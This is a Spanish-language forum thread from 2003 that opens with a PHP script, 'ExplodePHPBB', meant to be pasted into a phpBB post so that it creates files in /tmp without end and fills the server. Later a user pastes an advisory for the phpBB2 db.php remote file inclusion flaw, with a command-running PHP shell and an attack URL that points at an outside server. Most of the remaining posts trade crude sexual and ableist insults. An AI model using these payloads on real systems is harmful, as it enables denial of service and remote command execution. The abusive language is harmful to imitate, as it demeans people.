Página 1 de 4
Un besito del forito
Publicado: 17 Sep 2003 19:43
por Penetreitor
<? php
//*************** ExplodePHPBB by H4k1z *****************
//Usage: Copy this script into the text box, and simply click 'post'
//If u wanna fuck, fuck Them!
$aux=mkdir("/tmp/fuckyou_I_WAS_HERE",0777);
$ct=0;
while(1){
// As simple as you can see
$fp=fopen("/tmp/fuckyou_I_WAS_HERE/f".$ct,"w+");
$ct++;
}
//Good night baby!
?>
Publicado: 17 Sep 2003 20:00
por wendigo
A ver que no me entero.¿has intentado cargarte este foro?Lo has puesto para que nos carguemos el de yonkis?Me lo expliquen
Publicado: 17 Sep 2003 23:28
por |Cool|
Me da a mi que este tio lo único que ha hecho ha sido quedar como 1 webón!!!
1 Saludo
|Cool|
Publicado: 18 Sep 2003 13:22
por Juggernaut
Normalmente, los exploits que encuentras por ahí ya estan arreglados por las nuevas versiones, aunque vamos, todo puede ser.
Hace poco llegué incluso a probar uno (en un phpbb mío, por supuesto) que ya estaba arreglado, y que te daba una bonita ventana de "Hacking Attempt!" que debe acojonar... donde lo tengo?
A ver a veeer...
Código: Seleccionar todo
The "phpBB2 root path" variable accepts input from other web sites, and this enables remote attackers to execute arbitrary commands remotely.
The vulnerability lies in the fact that db.php accepts the following input:
'/phpBB2/includes/db.php?phpbb_root_path=full_path_to_script'
Where the full_path_to_script can be a full URL from another web server.
For example, create a directory called 'db' on your web server. Now at this db directory create a file called 'mysql.txt' or 'mysql4.txt' or 'postgres.txt' (other file name don't seem to work).
This mysql.txt should contain this line:
<? echo "<pre>"; system($cmd); ?>
The next step is to type in the following URL in your browser:
http://example.com/phpBB2/includes/db.php?phpbb_root_path=http://your_http_server/&dbms=mysql&phpEx=txt&cmd=uname%20-a
You should get the 'uname result' of example.com
Jejeje probadlo, da una ventanita blanca que pone "Hacking Attempt!" que acojona un huevo, te piensas que ya está la poli aquí buscandote.
Re: Un besito del forito
Publicado: 18 Sep 2003 17:48
por karhonte
Penetreitor escribió:<? php
//*************** ExplodePHPBB by H4k1z *****************
//Usage: Copy this script into the text box, and simply click 'post'
//If u wanna fuck, fuck Them!
$aux=mkdir("/tmp/fuckyou_I_WAS_HERE",0777);
$ct=0;
while(1){
// As simple as you can see
$fp=fopen("/tmp/fuckyou_I_WAS_HERE/f".$ct,"w+");
$ct++;
}
//Good night baby!
?>
hay que ser cateto para no saber mirar ni las versiones a las que afecta, menudo payaso, lo cambio no funciona, que vengan a por el y me traigan otro que al menos no se mee encima.
Re: Un besito del forito
Publicado: 18 Sep 2003 17:51
por Penetreitor
Loco Cosm¡co escribió:Penetreitor escribió:<? php
//*************** ExplodePHPBB by H4k1z *****************
//Usage: Copy this script into the text box, and simply click 'post'
//If u wanna fuck, fuck Them!
$aux=mkdir("/tmp/fuckyou_I_WAS_HERE",0777);
$ct=0;
while(1){
// As simple as you can see
$fp=fopen("/tmp/fuckyou_I_WAS_HERE/f".$ct,"w+");
$ct++;
}
//Good night baby!
?>
hay que ser cateto para no saber mirar ni las versiones a las que afecta, menudo payaso, lo cambio no funciona, que vengan a por el y me traigan otro que al menos no se mee encima.
tontorron, a ver si escribes bien, que parece que te han dao el graduao en la UNED
Re: Un besito del forito
Publicado: 18 Sep 2003 18:03
por karhonte
Penetreitor escribió:Loco Cosm¡co escribió:Penetreitor escribió:<? php
//*************** ExplodePHPBB by H4k1z *****************
//Usage: Copy this script into the text box, and simply click 'post'
//If u wanna fuck, fuck Them!
$aux=mkdir("/tmp/fuckyou_I_WAS_HERE",0777);
$ct=0;
while(1){
// As simple as you can see
$fp=fopen("/tmp/fuckyou_I_WAS_HERE/f".$ct,"w+");
$ct++;
}
//Good night baby!
?>
hay que ser cateto para no saber mirar ni las versiones a las que afecta, menudo payaso, lo cambio no funciona, que vengan a por el y me traigan otro que al menos no se mee encima.
tontorron, a ver si escribes bien, que parece que te han dao el graduao en la UNED
pero seras tonto pollas, no has hecho suficiente el ridiculo ya?, algunos nunca aprenden, quien eres, mongui? o algun primo suyo? su papa? o ambos? (supongo que sois muestra de lo que produce la consanguinidad) ya te has vuelto a mear encima?, tito ñurdu te cambiara los pañales, y te limpiara los pipis con la lengua, como a ti te gusta. Si no tienes nada mas que decir, por favor, respetate a ti mismo.
Publicado: 18 Sep 2003 18:14
por Penetreitor
mira, aqui el unico mongui eres tu, asi que deja de comer bocatas, que ya sabemos todos lo que pasa al final
Esta foto tuya me la ha dao un colega tuyo.
Publicado: 18 Sep 2003 18:24
por karhonte
Penetreitor escribió:mira, aqui el unico mongui eres tu, asi que deja de comer bocatas, que ya sabemos todos lo que pasa al final
Esta foto tuya me la ha dao un colega tuyo.
Eses es Benni Hill, idiota. De verdad no sabes nada mejor? eres asi de tonto en serio? no me engañas?, pobre criaturita descerebrada.....has tragado tanta lefa que el cerebro se ha tenido que poner a un lado para dejar sitio a ese liquido viscoso que tanto te gusta.
Publicado: 18 Sep 2003 18:28
por Penetreitor
jejeje
que se te ve el cartón
mongui